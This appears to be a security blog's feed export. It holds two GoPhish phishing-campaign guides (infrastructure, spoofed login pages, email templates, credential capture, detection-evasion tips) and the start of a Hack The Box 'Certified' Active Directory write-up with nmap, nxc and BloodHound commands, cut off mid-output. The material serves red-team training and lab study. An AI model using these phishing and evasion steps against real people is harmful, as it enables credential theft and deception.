Generation complete&quot;</span></span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=info msg=<span class="string">&quot;Starting admin server at https://127.0.0.1:4444&quot;</span></span><br></pre></td></tr></table></figure></div><p>Once GoPhish starts successfully, a temporary admin username and password will be displayed in the console output.<br>Use these credentials to log in to the GoPhish admin dashboard at: <a href="#">https://admin.domain.com:4444</a></p><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img2.png"                                     ></p><blockquote><p>Note: After the initial login, it is recommended to immediately change the default admin password from the User Management section.</p></blockquote><h3 id="Sending-Profile"><a href="#Sending-Profile" class="headerlink" title="Sending Profile"></a>Sending Profile</h3><p>First, configure the <strong>SMTP sending profile</strong> to send phishing emails from your phishing domain to the victim’s email address.<br>The required configuration format is shown in the screenshot below.</p><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img3.png"                                     ></p><p>In this setup, the domain was purchased from <strong>Namecheap</strong> and SMTP was configured using <strong>Private Email</strong>.<br>Ensure that <strong>SPF, DKIM, and DMARC</strong> records are properly configured to avoid email delivery issues.</p><p>SMTP configuration details can be obtained from the email provider’s documentation or the email account settings panel.</p><h3 id="Landing-Page"><a href="#Landing-Page" class="headerlink" title="Landing Page"></a>Landing Page</h3><p>Next, set up a <strong>landing page</strong> that will be presented to the victim. This page typically mimics a legitimate login portal to trick the victim into entering their credentials.</p><blockquote><p><strong>Note:</strong> Basic knowledge of <strong>HTML and CSS</strong> is required to design a realistic-looking landing page. In this case, a custom login page was created and saved as shown below.</p></blockquote><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img4.png"                                     ></p><h3 id="Email-Templates"><a href="#Email-Templates" class="headerlink" title="Email Templates"></a>Email Templates</h3><p>Next, create an <strong>email template</strong> that will be sent to the victims. A sample email template used in this setup is shown below.</p><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img5.png"                                     ></p><p>Basic knowledge of <strong>HTML and CSS</strong> is required to design effective and realistic phishing emails.</p><p>In the HTML code of the email template, add the variable <code>&#123;&#123;.URL&#125;&#125;</code>.<br><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img13.png"                                     ><br>This variable is used for the button or hyperlink in the email so that, when clicked, the victim is redirected to the phishing landing page.</p><p>Ensure the following fields are configured correctly:</p><ul><li><strong>Template Name</strong></li><li><strong>Subject</strong></li><li><strong>Envelope Sender</strong></li></ul><blockquote><p><strong>Important:</strong> The <strong>Envelope Sender</strong> must use an email address from the phishing domain. Envelope email can be anything but the address must end with <code>@&lt;phishingdomain.com&gt;</code>.<br>If an external or mismatched domain is used, GoPhish will reject the configuration while saving.</p></blockquote><h3 id="Users-and-Groups"><a href="#Users-and-Groups" class="headerlink" title="Users and Groups"></a>Users and Groups</h3><p>In this section, add the victim details such as <strong>First Name</strong>, <strong>Last Name</strong>, <strong>Position</strong>, and <strong>Email Address</strong>.<br>These values can be dynamically used inside the email template for personalization.</p><p>For example, at the beginning of the email body:</p><p><code>Dear &#123;&#123;.FirstName&#125;&#125; &#123;&#123;.LastName&#125;&#125;</code></p><p>If the recipient’s first or last name is not available, a generic greeting can be used instead, such as:</p><p><code>Dear Sir/Madam</code></p><p>Victims can be added:</p><ul><li>Manually, one by one</li><li>By importing a <code>.csv</code> file containing multiple users</li></ul><p>Below is an example of a group configured with a single user.</p><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img6.png"                                     ></p><p>Once the <strong>Sending Profile</strong>, <strong>Landing Page</strong>, <strong>Email Template</strong>, and <strong>Users &amp; Groups</strong> are configured, we are ready to launch a phishing campaign.</p><p>Navigate to <strong>Campaigns → New Campaign</strong> and configure the following fields:</p><ul><li><strong>Campaign Name</strong></li><li><strong>Email Template</strong></li><li><strong>Landing Page</strong></li><li><strong>URL</strong> (this should be your phishing domain, e.g., <code>https://example.com</code>)</li><li><strong>Launch Date and Time</strong></li><li><strong>Sending Profile</strong></li><li><strong>Target Group</strong></li></ul><p>Below is an example campaign configuration.</p><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img7.png"                                     ></p><h3 id="Launching-the-Campaign"><a href="#Launching-the-Campaign" class="headerlink" title="Launching the Campaign"></a>Launching the Campaign</h3><p>Once all configurations are completed, the campaign can be launched.<br><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img8.png"                                     ></p><p>After launching the campaign, check the victim’s inbox. The phishing email will be delivered based on the configured email template.<br><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img9.png"                                     ></p><p>When the victim clicks on the <strong>Go to Umbrella Portal</strong> button, they are redirected to the phishing landing page as shown below.<br><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img10.png"                                     ></p><h3 id="Credential-Capture"><a href="#Credential-Capture" class="headerlink" title="Credential Capture"></a>Credential Capture</h3><p>After the victim enters sample credentials and clicks <strong>Submit</strong>, the credentials are captured by GoPhish.<br>The victim is then redirected to the legitimate website configured earlier in the landing page settings.</p><p>Captured credentials can be viewed directly from the GoPhish dashboard, as shown below.</p><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img11.png"                                     ><br><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img12.png"                                     ></p><p>At this stage, we have <strong>successfully phished a user</strong>.</p><p>Sample (dummy) references for a working setup:</p><ul><li><a href="#">Landing Page</a></li><li><a href="#">Email Template</a></li></ul><h3 id="Hardening-Tips"><a href="#Hardening-Tips" class="headerlink" title="Hardening Tips"></a>Hardening Tips</h3><ul><li><p>Emails sent from GoPhish include the default header X-Mailer: GoPhish.<br>To reduce detection, override this by adding a custom X-Mailer header in the sending profile (e.g., Outlook or MS-Exchange). For more details, check out the blog post from TrustedSec: <a class="link"   href="https://trustedsec.com/blog/upgrade-your-workflow-part-2-building-phishing-checklists" >Upgrade Your Workflow – Part 2: Building Phishing Checklists<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p></li><li><p>Check the reputation of the phishing domain using <a class="link"   href="https://multirbl.valli.org/" >https://multirbl.valli.org/<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a><br>If the domain is listed in any blacklist, remediate it immediately to avoid mail delivery issues or domain suspension.</p></li><li><p>Perform a spam test before launching campaigns using <a class="link"   href="https://www.mail-tester.com/" >https://www.mail-tester.com/<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a><br>This performs a basic spam check on your email by analyzing content, formatting, and sender configuration to highlight common spam triggers and deliverability issues.</p></li><li><p>Carefully review firewall inbound rules:</p><ul><li>Block external access to <strong>SSH</strong></li><li>Restrict access to the <strong>GoPhish admin dashboard</strong>.<blockquote><p>During an active phishing campaign, expose the dashboard only to your own public IP address.</p></blockquote></li><li>Do not expose any management interfaces publicly<br>For more details, refer to my previous article: <a class="link"   href="https://0xsebin-blogs.vercel.app/2025/10/21/GoPhish-Setting-up-without-Evilgnix-Part-1/" >GoPhish Setting up without Evilginx – Part 1<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li></ul></li><li><p>Use a <strong>redirector</strong> to filter unwanted traffic and minimize direct exposure of the phishing server.</p></li></ul>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Phishing" scheme="http://example.com/categories/Phishing/"/>
    
    
    <category term="Phishing" scheme="http://example.com/tags/Phishing/"/>
    
    <category term="Red Teaming" scheme="http://example.com/tags/Red-Teaming/"/>
    
    <category term="GoPhish" scheme="http://example.com/tags/GoPhish/"/>
    
  </entry>
  
  <entry>
    <title>Gophish - Setting up without Evilginx - Part 1</title>
    <link href="http://example.com/2025/10/21/GoPhish-Setting-up-without-Evilgnix-Part-1/"/>
    <id>http://example.com/2025/10/21/GoPhish-Setting-up-without-Evilgnix-Part-1/</id>
    <published>2025-10-21T16:05:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="Gophish-Infrastructure-Setup-EC2-·-DNS-·-SMTP"><a href="#Gophish-Infrastructure-Setup-EC2-·-DNS-·-SMTP" class="headerlink" title="Gophish Infrastructure Setup (EC2 · DNS · SMTP)"></a>Gophish Infrastructure Setup (EC2 · DNS · SMTP)</h2><p>This section covers the infrastructure-level setup required before deploying GoPhish. Proper configuration at this stage is critical to avoid blacklisting, delivery issues, and operational failures during phishing simulations.</p><h3 id="Prerequisites"><a href="#Prerequisites" class="headerlink" title="Prerequisites"></a>Prerequisites</h3><hr><p>Before starting the setup, ensure the following requirements are met:</p><ul><li><strong>EC2 instance</strong> (Linux-based preferred)</li><li><strong>Phishing domain</strong> (e.g., Namecheap or GoDaddy)</li><li><strong>SMTP server</strong> associated with the same domain<br>(e.g., Titan Mail, Private Email, etc.)</li></ul><h3 id="EC2-Configuration"><a href="#EC2-Configuration" class="headerlink" title="EC2 Configuration"></a>EC2 Configuration</h3><hr><blockquote><p><strong>Note:</strong> Never expose GoPhish or phishing infrastructure publicly without restrictions. Improper exposure can quickly lead to blacklisting or service suspension.</p></blockquote><p>Recommended EC2 configuration:</p><ul><li><p><strong>Whitelist trusted IP addresses</strong> instead of allowing unrestricted access (<code>0.0.0.0/0</code>)</p></li><li><p>Be cautious of automated scanners and reputation monitoring platforms such as:</p><ul><li><a class="link"   href="https://spameatingmonkey.com/" >Spam-Eating Monkey<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li><li><a class="link"   href="https://docs.censys.com/docs/platform-threat-hunting-threat-hunting-dataset" >Censys Threat Hunting Dataset<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li></ul></li><li><p>Ensure <strong>port 443 (HTTPS)</strong> remains open<br>Blocking HTTPS can break landing pages, redirects, and certificate validation.</p></li><li><p>Allow only the required ports:</p><ul><li><code>22</code> → SSH (restricted to your IP)</li><li><code>80</code> → HTTP (optional, for redirects or ACME challenges)</li><li><code>443</code> → HTTPS (phishing landing pages)</li><li>One <strong>custom port</strong> (e.g., <code>3333</code>) for the GoPhish <strong>admin dashboard</strong></li></ul></li><li><p>After infrastructure setup:</p><ul><li>Apply <strong>strict IP whitelisting</strong> to the admin dashboard port</li><li>Never leave the GoPhish admin panel publicly accessible</li></ul></li></ul><h3 id="Domain-Configuration"><a href="#Domain-Configuration" class="headerlink" title="Domain Configuration"></a>Domain Configuration</h3><hr><p>Correct DNS configuration is essential for email deliverability and phishing reliability.</p><ul><li><p>Map the <strong>A record</strong> to your AWS EC2 public IP</p></li><li><p>Properly configure the following DNS records:</p><ul><li><strong>SPF</strong></li><li><strong>DMARC</strong></li><li><strong>DKIM</strong></li><li><strong>TXT</strong></li><li><strong>SRV</strong> (if required by your SMTP provider)</li></ul></li><li><p>Create <strong>two CNAME records</strong>:</p><ul><li>One for the <strong>GoPhish admin dashboard</strong></li><li>One for the <strong>phishing domain &#x2F; landing page</strong></li></ul></li></ul><h3 id="SMTP-Configuration"><a href="#SMTP-Configuration" class="headerlink" title="SMTP Configuration"></a>SMTP Configuration</h3><hr><p>SMTP configuration directly impacts campaign success and inbox placement.</p><p>Best practices:</p><ul><li>Ensure <strong>DKIM</strong> is added and successfully verified</li><li>Use <strong>multiple SMTP servers</strong> if possible to distribute sending load</li><li>Prefer a <strong>paid or premium SMTP plan</strong> for:<ul><li>Better deliverability</li><li>Reduced throttling</li><li>Improved sender reputation</li></ul></li></ul><h2 id="Compliance-and-Operational-Notes"><a href="#Compliance-and-Operational-Notes" class="headerlink" title="Compliance and Operational Notes"></a>Compliance and Operational Notes</h2><h3 id="Awareness-Reputation-Threat-Monitoring-Services"><a href="#Awareness-Reputation-Threat-Monitoring-Services" class="headerlink" title="Awareness: Reputation &amp; Threat Monitoring Services"></a>Awareness: Reputation &amp; Threat Monitoring Services</h3><hr><p>⚠️ Certain platforms actively monitor spam and phishing-related infrastructure. Poor OPSEC may result in rapid blacklisting.</p><p>Be aware of:</p><ul><li><a class="link"   href="https://spameatingmonkey.com/" >Spam-Eating Monkey<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li><li><a class="link"   href="https://docs.censys.com/docs/platform-threat-hunting-threat-hunting-dataset" >Censys Threat Hunting Dataset<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li></ul><h3 id="AWS-Permission-Requirement"><a href="#AWS-Permission-Requirement" class="headerlink" title="AWS Permission Requirement"></a>AWS Permission Requirement</h3><hr><p>Before launching <strong>any phishing or social engineering campaign</strong>, explicit authorization must be obtained from AWS.</p><p>Failure to comply may result in account suspension or termination.</p><ul><li>AWS Penetration Testing Policy:<br><a class="link"   href="https://aws.amazon.com/security/penetration-testing/" >https://aws.amazon.com/security/penetration-testing/<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li></ul><h3 id="Next-Section"><a href="#Next-Section" class="headerlink" title="Next Section"></a>Next Section</h3><hr><p><strong>Part II - GoPhish Setup</strong><br><a class="link"   href="https://0xsebin-blogs.vercel.app/2025/12/25/GoPhish-Setting-up-without-Evilgnix-Part-2/" >Campaign creation, landing pages, email templates, and credential capture<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Phishing" scheme="http://example.com/categories/Phishing/"/>
    
    
    <category term="Phishing" scheme="http://example.com/tags/Phishing/"/>
    
    <category term="Red Teaming" scheme="http://example.com/tags/Red-Teaming/"/>
    
    <category term="GoPhish" scheme="http://example.com/tags/GoPhish/"/>
    
  </entry>
  
  <entry>
    <title>Certified - Hack The Box</title>
    <link href="http://example.com/2025/03/15/Certified/"/>
    <id>http://example.com/2025/03/15/Certified/</id>
    <published>2025-03-15T02:32:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><p>We began with the low-privileged user <code>JUDITH.MADER@CERTIFIED.HTB</code>, who had the ability to modify the owner of <code>MANAGEMENT@CERTIFIED.HTB</code>. By changing ownership, we added a controlled user to this group, escalating privileges. Next, we exploited GenericWrite permissions of <code>MANAGEMENT@CERTIFIED.HTB</code> over <code>MANAGEMENT_SVC@CERTIFIED</code>.HTB, allowing us to modify attributes and gain access as <code>MANAGEMENT_SVC</code>. </p><p>This account had GenericAll over <code>CA_OPERATOR@CERTIFIED.HTB</code>, enabling a full takeover. With control over <code>CA_OPERATOR</code>, we identified potential privileges related to Active Directory Certificate Services (AD CS). Using this, we requested a certificate for the Administrator account, obtained a TGT and extracted the NT hash, allowing us to authenticate as Administrator on the Domain Controller (DC) and achieve full domain compromise.</p><h3 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h3><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified nmap -sCV certified.htb -v                             </span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-24 07:39 EST</span><br><span class="line">NSE: Loaded 157 scripts for scanning.</span><br><span class="line">NSE: Script Pre-scanning.</span><br><span class="line">Initiating NSE at 07:39</span><br><span class="line">Completed NSE at 07:39, 0.00s elapsed</span><br><span class="line">Initiating NSE at 07:39</span><br><span class="line">Completed NSE at 07:39, 0.00s elapsed</span><br><span class="line">Initiating NSE at 07:39</span><br><span class="line">Completed NSE at 07:39, 0.00s elapsed</span><br><span class="line">Initiating Ping Scan at 07:39</span><br><span class="line">Scanning certified.htb (10.10.11.41) [4 ports]</span><br><span class="line">Completed Ping Scan at 07:39, 0.34s elapsed (1 total hosts)</span><br><span class="line">Initiating SYN Stealth Scan at 07:39</span><br><span class="line">Scanning certified.htb (10.10.11.41) [1000 ports]</span><br><span class="line">Discovered open port 53/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 445/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 135/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 139/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 3269/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 5985/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 593/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 389/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 88/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 636/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 464/tcp on 10.10.11.41</span><br><span class="line">Discovered open port 3268/tcp on 10.10.11.41</span><br><span class="line">Completed SYN Stealth Scan at 07:40, 26.07s elapsed (1000 total ports)</span><br><span class="line">Initiating Service scan at 07:40</span><br><span class="line">Scanning 12 services on certified.htb (10.10.11.41)</span><br><span class="line">Completed Service scan at 07:41, 60.07s elapsed (12 services on 1 host)</span><br><span class="line">NSE: Script scanning 10.10.11.41.</span><br><span class="line">Initiating NSE at 07:41</span><br><span class="line">Completed NSE at 07:41, 41.33s elapsed</span><br><span class="line">Initiating NSE at 07:41</span><br><span class="line">Completed NSE at 07:42, 10.69s elapsed</span><br><span class="line">Initiating NSE at 07:42</span><br><span class="line">Completed NSE at 07:42, 0.00s elapsed</span><br><span class="line">Nmap scan report for certified.htb (10.10.11.41)</span><br><span class="line">Host is up (0.38s latency).</span><br><span class="line">Not shown: 988 filtered tcp ports (no-response)</span><br><span class="line">PORT     STATE SERVICE       VERSION</span><br><span class="line">53/tcp   open  domain        Simple DNS Plus</span><br><span class="line">88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-24 12:46:28Z)</span><br><span class="line">135/tcp  open  msrpc         Microsoft Windows RPC</span><br><span class="line">139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)</span><br><span class="line">| ssl-cert: Subject: commonName=DC01.certified.htb</span><br><span class="line">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certified.htb</span><br><span class="line">| Issuer: commonName=certified-DC01-CA</span><br><span class="line">| Public Key type: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-05-13T15:49:36</span><br><span class="line">| Not valid after:  2025-05-13T15:49:36</span><br><span class="line">| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc</span><br><span class="line">|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828</span><br><span class="line">|_ssl-date: 2025-02-24T12:48:14+00:00; +6m16s from scanner time.</span><br><span class="line">445/tcp  open  microsoft-ds?</span><br><span class="line">464/tcp  open  kpasswd5?</span><br><span class="line">593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)</span><br><span class="line">|_ssl-date: 2025-02-24T12:48:13+00:00; +6m16s from scanner time.</span><br><span class="line">| ssl-cert: Subject: commonName=DC01.certified.htb</span><br><span class="line">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certified.htb</span><br><span class="line">| Issuer: commonName=certified-DC01-CA</span><br><span class="line">| Public Key type: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-05-13T15:49:36</span><br><span class="line">| Not valid after:  2025-05-13T15:49:36</span><br><span class="line">| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc</span><br><span class="line">|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828</span><br><span class="line">3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)</span><br><span class="line">| ssl-cert: Subject: commonName=DC01.certified.htb</span><br><span class="line">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certified.htb</span><br><span class="line">| Issuer: commonName=certified-DC01-CA</span><br><span class="line">| Public Key type: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-05-13T15:49:36</span><br><span class="line">| Not valid after:  2025-05-13T15:49:36</span><br><span class="line">| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc</span><br><span class="line">|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828</span><br><span class="line">|_ssl-date: 2025-02-24T12:48:14+00:00; +6m16s from scanner time.</span><br><span class="line">3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)</span><br><span class="line">|_ssl-date: 2025-02-24T12:48:13+00:00; +6m16s from scanner time.</span><br><span class="line">| ssl-cert: Subject: commonName=DC01.certified.htb</span><br><span class="line">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certified.htb</span><br><span class="line">| Issuer: commonName=certified-DC01-CA</span><br><span class="line">| Public Key type: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-05-13T15:49:36</span><br><span class="line">| Not valid after:  2025-05-13T15:49:36</span><br><span class="line">| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc</span><br><span class="line">|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828</span><br><span class="line">5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">|_clock-skew: mean: 6m15s, deviation: 1s, median: 6m15s</span><br><span class="line">| smb2-time: </span><br><span class="line">|   date: 2025-02-24T12:47:33</span><br><span class="line">|_  start_date: N/A</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   3:1:1: </span><br><span class="line">|_    Message signing enabled and required</span><br><span class="line"></span><br><span class="line">NSE: Script Post-scanning.</span><br><span class="line">Initiating NSE at 07:42</span><br><span class="line">Completed NSE at 07:42, 0.00s elapsed</span><br><span class="line">Initiating NSE at 07:42</span><br><span class="line">Completed NSE at 07:42, 0.00s elapsed</span><br><span class="line">Initiating NSE at 07:42</span><br><span class="line">Completed NSE at 07:42, 0.00s elapsed</span><br><span class="line">Read data files from: /usr/share/nmap</span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 139.20 seconds</span><br><span class="line">           Raw packets sent: 2003 (88.108KB) | Rcvd: 25 (1.080KB)</span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified nxc smb certified.htb -u judith.mader -p judith09        </span><br><span class="line">SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 </span><br><span class="line">➜  Certified </span><br></pre></td></tr></table></figure></div><h4 id="Bloodhound"><a href="#Bloodhound" class="headerlink" title="Bloodhound"></a>Bloodhound</h4><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">➜  Certified bloodhound-python -ns 10.10.11.41 -d certified.htb -u &#x27;judith.mader&#x27; -p &#x27;judith09&#x27; --zip -c all --dns-tcp</span><br><span class="line">INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)</span><br><span class="line">INFO: Found AD domain: certified.htb</span><br><span class="line">INFO: Getting TGT for user</span><br><span class="line">INFO: Connecting to LDAP server: dc01.certified.htb</span><br><span class="line">INFO: Found 1 domains</span><br><span class="line">INFO: Found 1 domains in the forest</span><br><span class="line">INFO: Found 1 computers</span><br><span class="line">INFO: Connecting to LDAP server: dc01.certified.htb</span><br><span class="line">INFO: Found 10 users</span><br><span class="line">INFO: Found 53 groups</span><br><span class="line">INFO: Found 2 gpos</span><br><span class="line">INFO: Found 1 ous</span><br><span class="line">INFO: Found 19 containers</span><br><span class="line">INFO: Found 0 trusts</span><br><span class="line">INFO: Starting computer enumeration with 10 workers</span><br><span class="line">INFO: Querying computer: DC01.certified.htb</span><br><span class="line">WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.41:445)] timed out</span><br><span class="line">INFO: Done in 01M 44S</span><br><span 